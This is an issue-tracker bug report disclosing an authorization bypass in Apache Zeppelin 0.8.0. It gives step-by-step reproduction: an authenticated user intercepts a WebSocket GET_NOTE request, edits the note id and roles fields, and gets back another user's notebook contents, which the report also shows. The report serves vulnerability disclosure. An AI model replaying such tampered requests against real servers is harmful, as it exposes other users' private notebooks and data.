Uploaded image for project: 'Zeppelin'
  1. Zeppelin
  2. ZEPPELIN-3906

[security]Zeppelin Notebooks can be accessed by unauthorized Users

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Open
    • Priority: Major
    • Resolution: Unresolved
    • Affects Version/s: 0.8.0
    • Fix Version/s: None
    • Component/s: zeppelin-server
    • Labels:
    • Environment:

      Easily reproducible in 0.8 zeppelin version with Simple web socket client google extension

      Description

      Zeppelin Notebook Role Access can be easily Bypassed and we can access Others notebook

      The exploit is achieved using web sockets, as Zeppelin’s web sockets fails to validate if the active session of the user’s role, making the request, is allowed to access another user’s note/data. The Zeppelin web socket requests can be intercepted, by a malicious authenticated user, and the role value modified enabling access to the other user’s jobs/results.

      Reproduction Steps:
      The following is required to reproduce this finding:

      1. Authentication to the Zeppelin service, using user1, as a valid "ticket” value is required by the web socket request.
      (assume i logged in as akhil/akhil as basic authentication method of zeppelin)
      2) open 'Simple Web Socket Client' - Chrome extension ( or use any interceptor tool like burp)

      3) open a Random notebook . we can see Zeeplin-web client will be sending request

      {"op":"GET_NOTE","data":{"id":"2DWPTEZCW"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[admin]"}
      

      4) modify the above request > add a noteID which role admin doesnt have access, edit the role to

      {"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
      

      5) see the response from web scoket :

      {"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
      {"op":"NOTE","data":{"note":{"paragraphs":[{"text":"whoami","user":"akhil","dateUpdated":"2018-12-12T03:27:52+0000","config":{"colWidth":12.0,"enabled":true,"results":{},"editorSetting":{"editOnDblClick":false,"language":"sh"},"editorMode":"ace/mode/sh"},"settings":{"params":{},"forms":{}},"results":{"code":"SUCCESS","msg":[{"type":"TEXT","data":"zeppelin\n"}]},"apps":[],"jobName":"paragraph_1544585263373_-927336176","id":"20181212-032743_583387567","dateCreated":"2018-12-12T03:27:43+0000","dateStarted":"2018-12-12T03:27:52+0000","dateFinished":"2018-12-12T03:27:53+0000","status":"FINISHED","progressUpdateIntervalMs":500},{"user":"akhil","config":{},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1544585272646_-198606435","id":"20181212-032752_1799562836","dateCreated":"2018-12-12T03:27:52+0000","status":"READY","progressUpdateIntervalMs":500}],"name":"Akhil Note","id":"2DZETETMP","angularObjects":{"2CHS8UYQQ:shared_process":[],"2CK8A9MEG:shared_process":[],"2CKAY1A8Y:shared_process":[],"2CKEKWY8Z:shared_process":[]},"config":{"isZeppelinNotebookCronEnable":false},"info":{}}},"ticket":"anonymous","principal":"anonymous","roles":""}
      

      we will get whole details of notebook even though the JSESSIONID and ticket is authenticated against admin and admin doesnt have access to NOTEBOOK : 2DZETETMP

        Attachments

        1. Zeppelin-role-issue.mov
          29.34 MB
          Akhil S Naik
        2. Screen Shot 2018-12-13 at 9.58.21 AM.png
          321 kB
          Akhil S Naik

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              akhilsnaik Akhil S Naik
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated: